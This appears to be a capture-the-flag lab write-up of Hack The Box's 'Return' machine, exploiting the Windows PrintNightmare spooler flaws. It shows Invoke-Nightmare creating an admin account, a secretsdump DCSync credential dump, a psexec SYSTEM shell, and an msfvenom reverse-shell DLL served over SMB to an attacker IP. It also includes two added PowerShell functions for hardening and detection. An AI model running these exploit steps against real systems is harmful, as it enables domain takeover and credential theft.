CVE-2021-1675


A vulnerability classified as critical was found in Microsoft Windows (Operating System). Affected by this vulnerability is an unknown part of the Print Spooler component. The impact is known to affect confidentiality, integrity, and availability. Low-privileged users are able to add a printer and, specifically, supply a malicious driver for that printer, which results in escalation of privileges and SYSTEM-level access.

Overview of CVE-2021-1675/CVE-2021-34527

The vulnerability takes advantage of the Windows-native Print Spooler service, which is enabled by default on all Windows machines (servers and endpoints).

*evil-winrm* ps c:\tmp> Get-Service Spooler
 
Status   Name               DisplayName
------   ----               -----------
Running  Spooler            Print Spooler

I can test for the Windows Spooler service locally, although there have been many different sources that indicate its presence.
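The service check above confirms that Spooler is running; from a defender's side the questions are whether this host needs the service at all and whether the Point and Print hardening Microsoft published for this bug class is in place. The function below is an added example, not from the write-up or from the exploit it uses: it reports the Spooler state, flags a Spooler running on a domain controller, reads the documented PointAndPrint policy values, and with -Remediate applies the recommended settings. The registry path and value names are Microsoft's; the function name and the finding strings are mine.

```powershell
# Added example (not from the original write-up or the exploit it uses): assess
# whether this host is exposed to the PrintNightmare bug class and, with
# -Remediate, apply the mitigations Microsoft documented for CVE-2021-34527.
# Run in an elevated PowerShell session on the host being checked. The registry
# path and value names are Microsoft's; the function name and finding strings
# are mine.

function Test-SpoolerExposure {
    [CmdletBinding()]
    param(
        # Apply fixes instead of only reporting. Off by default.
        [switch]$Remediate
    )

    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. Print Spooler service state and startup type
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    if ($null -eq $spooler) {
        $findings.Add('Spooler service not present')
    } else {
        $findings.Add("Spooler status=$($spooler.Status) startup=$($spooler.StartType)")
    }

    # 2. Domain controller? Win32_ComputerSystem.DomainRole 4 = backup DC, 5 = primary DC.
    #    A spooler LPE on a DC is a domain compromise (the DCSync step on this page).
    $isDC = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole -ge 4
    if ($isDC -and $spooler -and $spooler.Status -eq 'Running') {
        $findings.Add('RISK: Print Spooler is running on a domain controller')
    }

    # 3. Point and Print policy. RestrictDriverInstallationToAdministrators=1 blocks
    #    the non-admin driver install that both CVEs rely on; the other two values
    #    must not silently approve driver installs/updates from print servers.
    $pnp    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $policy = Get-ItemProperty -Path $pnp -ErrorAction SilentlyContinue
    if ($policy.RestrictDriverInstallationToAdministrators -ne 1) {
        $findings.Add('RISK: RestrictDriverInstallationToAdministrators is not 1; non-admins can add printer drivers')
    }
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        $value = $policy.$name
        if ($null -ne $value -and $value -ne 0) {
            $findings.Add("RISK: $name=$value weakens Point and Print prompts (expected 0)")
        }
    }

    if ($Remediate) {
        if (-not (Test-Path -Path $pnp)) { New-Item -Path $pnp -Force | Out-Null }
        $wanted = @{
            RestrictDriverInstallationToAdministrators = 1
            NoWarningNoElevationOnInstall              = 0
            UpdatePromptSettings                       = 0
        }
        foreach ($pair in $wanted.GetEnumerator()) {
            New-ItemProperty -Path $pnp -Name $pair.Key -PropertyType DWord `
                -Value $pair.Value -Force | Out-Null
        }
        # A server that never prints (a DC in particular) should not run the service at all.
        if ($isDC -and $spooler) {
            Stop-Service -Name Spooler -Force
            Set-Service -Name Spooler -StartupType Disabled
        }
        $findings.Add('Mitigations applied; re-run without -Remediate to confirm')
    }

    return $findings
}

Test-SpoolerExposure
```

Run it as-is to get a list of findings; on a host like the one in this write-up (Spooler running on the DC, no PointAndPrint policy set) it reports two RISK lines. Disabling the service is the complete fix for both the local and the remote variant because it removes the MS-RPRN and MS-PAR endpoints entirely; the policy values are the fallback for hosts that must keep printing.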

Exploit (PrintNightmare)


Invoke-Nightmare.ps1 is a PowerShell implementation of the PrintNightmare LPE exploit for CVE-2021-1675.

Exploitation


*evil-winrm* ps c:\tmp> upload Invoke-Nightmare.ps1 C:\tmp\Invoke-Nightmare.ps1
info: Uploading Invoke-Nightmare.ps1 to C:\tmp\Invoke-Nightmare.ps1
 
data: 238080 bytes of 238080 bytes copied
 
info: Upload successful!

I first need to transfer the exploit script.

*evil-winrm* ps c:\tmp> . .\Invoke-Nightmare.ps1
*evil-winrm* ps c:\tmp> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at c:\Users\svc-printer\AppData\Local\Temp\nightmare.dll
[+] using pdriverpath = "c:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from c:\Users\svc-printer\AppData\Local\Temp\nightmare.dll

Importing the exploit script and running the exploit cmdlet creates and loads a malicious DLL payload for the printer, which results in a local administrator account being created for the attacker. The newly created credential is adm1n:P@ssw0rd.

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ evil-winrm -i printer.return.local -u adm1n -p 'P@ssw0rd'                              
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\adm1n\Documents> whoami /groups
 
GROUP INFORMATION
-----------------
 
Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

Successfully connected over WinRM to the target system as the newly created adm1n user. As the output above shows, the user is part of the Administrators group.

At this point, I can just perform the DCSync attack to extract domain credential hashes, since I am a local administrator on a DC host.

DCSync Attack


┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ impacket-secretsdump adm1n:P@ssw0rd@printer.return.local -target-ip $IP -dc-ip $IP 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa42289f69adb35cd67d02cc84e69c314
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:34386a771aaca697f447754e4863d38a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RETURN\PRINTER$:aes256-cts-hmac-sha1-96:8ad926efb270eb570b27b3df1d5974e3510b063dfe4719c936596661dd8044f7
RETURN\PRINTER$:aes128-cts-hmac-sha1-96:c4f7bc24dacca04acf119d1c2ab4cb87
RETURN\PRINTER$:des-cbc-md5:6ddff7cb0b8fb5da
RETURN\PRINTER$:plain_password_hex:d586e0dfba788f299e7f7182834cfb7303eec0aa2a60b4660e3f759d07d358f9367ee5858dd3f8450cd78f8b0e31cb0dfab5376d8d78c461668a912e2445c643883023b2ffccdcf74343d07274fe2e6814b7213e865de94dd5f4f49e0e857084fdeb829ed4b484446c83d612a8a43a3d40adf0d344be12b113ad1c30378cfa0a578944af25c518b58cf1c296576080ff59be2aa5b1ed33c8aadf358a3d24f50423b6f05e735b92d9c84f23455ca875637eacd2b464736e71c2359bc5645a2b9d273d4e1f9b779affdce1caa831bbb887f61801bb21316c234c13007b98587162d309379b691a01de8f7dae789988c311
RETURN\PRINTER$:aad3b435b51404eeaad3b435b51404ee:efb65b83b414ea32e6ed711633871917:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x06243ead9780ed8b9e36d34624aca3eff9eff2a0
dpapi_userkey:0x3dba4981ae9cb884001d7b0b3ffa5d3504fc12b8
[*] NL$KM 
 0000   16 BD CA 34 21 A5 5C AD  51 ED B1 7E 4A 4F 59 B8   ...4!.\.Q..~JOY.
 0010   C3 65 1E 1A 5D 6D 97 82  79 3A 58 A0 FC 2B B5 8B   .e..]m..y:X..+..
 0020   A4 E2 9B CF DD 7B 52 80  99 33 45 4F F1 35 15 DC   .....{R..3EO.5..
 0030   4F 99 B3 A1 CB 55 21 A5  CC F5 27 43 F7 16 AA BC   O....U!...'C....
NL$KM:16bdca3421a55cad51edb17e4a4f59b8c3651e1a5d6d9782793a58a0fc2bb58ba4e29bcfdd7b52809933454ff13515dc4f99b3a1cb5521a5ccf52743f716aabc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
adm1n:6106:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
PRINTER$:1000:aad3b435b51404eeaad3b435b51404ee:efb65b83b414ea32e6ed711633871917:::
WIN-BTT8JH9ZU7D$:6101:aad3b435b51404eeaad3b435b51404ee:d5a1639e71af144a93e7921063ba4965:::
WIN-ZDYO0TA5DLN$:6102:aad3b435b51404eeaad3b435b51404ee:8cd5277ac440c3fbe98cd093c1684297:::
WIN-UPQBCAW6CI8$:6103:aad3b435b51404eeaad3b435b51404ee:71c421066ad175a954e5964b82aeb7f1:::
WIN-LJYE51GOLME$:6104:aad3b435b51404eeaad3b435b51404ee:beb45a5ee90ab11f3ce57122ba829d4c:::
WIN-BLVZWHNYLE2$:6105:aad3b435b51404eeaad3b435b51404ee:296bc1d1b7e86076c2adec4ff7775f8a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
Administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
Administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
adm1n:aes256-cts-hmac-sha1-96:3a0b9cf60044aba3341f8568b508832e4a9bf8d41b14e9bdb5976d60e8b0aa46
adm1n:aes128-cts-hmac-sha1-96:14ac271e2a68d075291fa956016d54c5
adm1n:des-cbc-md5:bf80f7c1b9439749
PRINTER$:aes256-cts-hmac-sha1-96:8ad926efb270eb570b27b3df1d5974e3510b063dfe4719c936596661dd8044f7
PRINTER$:aes128-cts-hmac-sha1-96:c4f7bc24dacca04acf119d1c2ab4cb87
PRINTER$:des-cbc-md5:2a3df408ea080716
WIN-BTT8JH9ZU7D$:aes256-cts-hmac-sha1-96:41597db8d62a1e39d29298137422439151e47414f145dc3000129a86f6e4b67e
WIN-BTT8JH9ZU7D$:aes128-cts-hmac-sha1-96:95bbe6e763622f64d61a6bc2d2931417
WIN-BTT8JH9ZU7D$:des-cbc-md5:ba6b13fe5b310d68
WIN-ZDYO0TA5DLN$:aes256-cts-hmac-sha1-96:f2656ac81bc9736177d6ad189045dcd3799d3070f7011d8f3114c02506d15534
WIN-ZDYO0TA5DLN$:aes128-cts-hmac-sha1-96:ebff090f26d8e80ddad5c012a68d5840
WIN-ZDYO0TA5DLN$:des-cbc-md5:386dcdb5fec86798
WIN-UPQBCAW6CI8$:aes256-cts-hmac-sha1-96:79042054d4172c8fb9fb4b109899784aac4f0212e98715a94e11b18b18570802
WIN-UPQBCAW6CI8$:aes128-cts-hmac-sha1-96:46bac209bb63287a60a48d4da5edceaf
WIN-UPQBCAW6CI8$:des-cbc-md5:9e01ce89d0ab89d9
WIN-LJYE51GOLME$:aes256-cts-hmac-sha1-96:2954b1d6580fe5d03723e0f93069205e172a96dc1d9d5dc2964a0ce5e8321915
WIN-LJYE51GOLME$:aes128-cts-hmac-sha1-96:0b466f76511caa0e84b3876a57c88a20
WIN-LJYE51GOLME$:des-cbc-md5:a1df45ec85aef423
WIN-BLVZWHNYLE2$:aes256-cts-hmac-sha1-96:0b192467ca1ebe6301976d3cc779a058adafc35613b3c67269bd1087d71100fc
WIN-BLVZWHNYLE2$:aes128-cts-hmac-sha1-96:adf7063eea9e7180360df2bd693312a3
WIN-BLVZWHNYLE2$:des-cbc-md5:e3618fd546086b9e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shelldrop


┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ impacket-psexec adm1n:P@ssw0rd@printer.return.local -dc-ip $IP     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on printer.return.local.....
[*] Found writable share ADMIN$
[*] Uploading file SARwpwAm.exe
[*] Opening SVCManager on printer.return.local.....
[*] Creating service SCDQ on printer.return.local.....
[*] Starting service SCDQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
printer
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::1a2
   ipv6 address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
   link-local ipv6 address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
   ipv4 address. . . . . . . . . . . : 10.10.11.108
   subnet mask . . . . . . . . . . . : 255.255.254.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
                                       10.10.10.2

System Level Compromise
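From the blue-team side, every step of the chain above leaves an event-log footprint: the driver install (PrintService/Operational 316, and 808 when the spooler fails to load the dropped module), the new local administrator (Security 4720, and 4732 against BUILTIN\Administrators, SID S-1-5-32-544 as in the whoami output), the replication request behind secretsdump's DRSUAPI dump (Security 4662 carrying the DS-Replication-Get-Changes rights), the RemoteRegistry start it triggers (System 7036), and the PsExec service (System 7045). The function below is an added example, not part of the write-up or of any tool it uses; the log names and event IDs are the standard Windows ones, while the function name, output columns and Why strings are mine.

```powershell
# Added example (not from the original write-up or any tool it uses): hunt for
# the event-log footprint the chain on this page leaves behind. Run elevated on
# the affected host (the DC, in this case). Log names and event IDs are the
# standard Windows ones; the function name, output columns and Why strings are
# mine. Two prerequisites: Microsoft-Windows-PrintService/Operational is off by
# default (enable it with: wevtutil sl Microsoft-Windows-PrintService/Operational /e:true)
# and 4662 requires "Audit Directory Service Access" to be enabled on the DC.

function Find-PrintNightmareArtifacts {
    [CmdletBinding()]
    param([int]$Hours = 24)

    $since = (Get-Date).AddHours(-$Hours)
    $hits  = [System.Collections.Generic.List[object]]::new()

    # Control-access-right GUIDs for DS-Replication-Get-Changes and -Get-Changes-All;
    # a 4662 carrying either one is a replication request, which is what DCSync is.
    $replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2|1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'

    $queries = @(
        @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316, 808
           Why = 'printer driver added/updated, or spooler failed to load a plug-in module' }
        @{ LogName = 'Security'; Id = 4720, 4732
           Why = 'local account created / member added to BUILTIN\Administrators' }
        @{ LogName = 'Security'; Id = 4662
           Why = 'directory replication rights exercised (DCSync)' }
        @{ LogName = 'System'; Id = 7045, 7036
           Why = 'service installed (PsExec) / Remote Registry started (secretsdump)' }
    )

    foreach ($q in $queries) {
        $filter = @{ LogName = $q.LogName; Id = $q.Id; StartTime = $since }
        $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
        foreach ($e in $events) {
            $xml = $e.ToXml()
            $msg = [string]$e.Message
            # Per-ID filters that cut the noisy IDs down to the interesting cases
            $keep = switch ($e.Id) {
                4732    { $xml -match 'S-1-5-32-544' }   # target group is BUILTIN\Administrators
                4662    { $xml -match $replGuids }
                7036    { ($xml -match 'Remote Registry') -and ($xml -match 'running') }
                default { $true }
            }
            if (-not $keep) { continue }

            $hits.Add([pscustomobject]@{
                Time   = $e.TimeCreated
                Log    = $q.LogName
                Id     = $e.Id
                Why    = $q.Why
                # A driver whose files live on a UNC path is the remote variant's hallmark
                Remote = ($e.Id -eq 316 -and $msg -match '\\\\\S+\\')
                Detail = ($msg -split "`r?`n")[0]
            })
        }
    }
    return $hits | Sort-Object -Property Time
}

Find-PrintNightmareArtifacts -Hours 48 | Format-Table -AutoSize
```

The switch handles the two IDs that fire constantly in normal operation (4732 for any local group change, 7036 for any service transition) so that only the Administrators alias and the Remote Registry service survive; 316 is kept unfiltered because on a server that should not be printing at all, any driver install within the window is worth a look, and the Remote column marks the UNC-path case.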

CVE-2021-34527 Fail


CVE-2021-34527 is the remote variant of CVE-2021-1675. It is exploited over MS-RPRN and MS-PAR via MSRPC, and works by abusing a logic flaw in the MS-RPRN protocol's RpcAddPrinterDriverEx function.

There is another method through the MS-PAR protocol's RpcAsyncAddPrinterDriver function. This is similar to RpcAddPrinterDriverEx but has far fewer constraints, and is not limited to domain controllers or Windows 10 systems with non-default settings.

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ impacket-rpcdump $IP | grep -iE 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol 

I ran a quick test to see if they are available, and they are indeed available and present on the target system. This is much expected, as there is a printer service running.

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-34527]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.7 LPORT=1234 -f dll -o printnightmare.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1881 bytes
Final size of dll file: 8704 bytes
Saved as: printnightmare.dll

A malicious DLL payload is generated with msfvenom. The Windows Spooler service on the target system will fetch it from a remote SMB server (Kali).

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ nnc 1234                      
listening on [any] 1234 ...

A Netcat listener to receive a shell session once the target printer executes the malicious DLL.

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-34527]
└─$ simplesmb . -smb2support 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

This is the remote SMB server from which the Windows Spooler service on the target system will fetch the DLL payload.

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-1675]
└─$ python3 CVE-2021-1675.py return.local/svc-printer@printer.return.local '\\10.10.14.7\smb\printnightmare.dll'
Password: 1edFg43012!!
[*] Connecting to ncacn_np:printer.return.local[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.7\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Stage0: 0

Executing the exploit results in failure.

This is very strange, because the Spooler service connected back and authenticated to the SMB server running on Kali with the computer account's credential, which means it was running at SYSTEM level.

It even fetched the malicious DLL, but there was no execution.